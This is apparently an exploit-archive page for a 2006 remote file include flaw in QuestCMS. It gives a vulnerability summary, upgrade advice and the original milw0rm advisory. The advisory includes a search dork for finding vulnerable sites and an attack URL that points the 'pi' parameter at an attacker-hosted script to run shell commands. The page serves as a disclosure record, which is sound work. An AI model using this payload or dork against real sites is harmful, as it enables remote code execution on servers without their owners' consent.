header-logo
Suggest Exploit
vendor:
QuestCMS
by:
Crackers_Child
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: QuestCMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Questcms Remote File Include Vulnerability

A vulnerability exists in Questwork Web Content Management system (QuestCMS) which allows an attacker to include a remote file by using a malicious URL in the 'pi' parameter in main/main.php. This can be exploited to execute arbitrary PHP code by including a file from a malicious server.

Mitigation:

Upgrade to the latest version of QuestCMS
Source

Exploit-DB raw data:

!!!!!!!!!WWW.SÝBERSAVASCÝLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------

Title : Questcms Remote File Include Vulnerability

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: crackers_child@sibersavascilar.com

--------------------------------------------------------------------------------
Affected software description :
--------------------------------------------------------------------------------
Application :  Questwork Web Content Management system (QuestCMS)
URL :  http://www.questwork.com

--------------------------------------------------------------------------------

dork        : allinurl:"/questcms/"
Exploit     :

--------------------------------------------------------------------------------

Usage:

http://[target]/[questcms_path]/main/main.php?pi=http://[evilhost]/cmd.txt?&cmd=ls

--------------------------------------------------------------------------------

greets:

X_ALPREN_X,Root_Mor and My Other Friends

--------------------------------------------------------------------------------



--------------------------------- [ WWW.SÝBERSAVASCÝLAR.COM ] --------------------------------------

# milw0rm.com [2006-08-07]

Navigation

Suggest Exploit

Services By CQR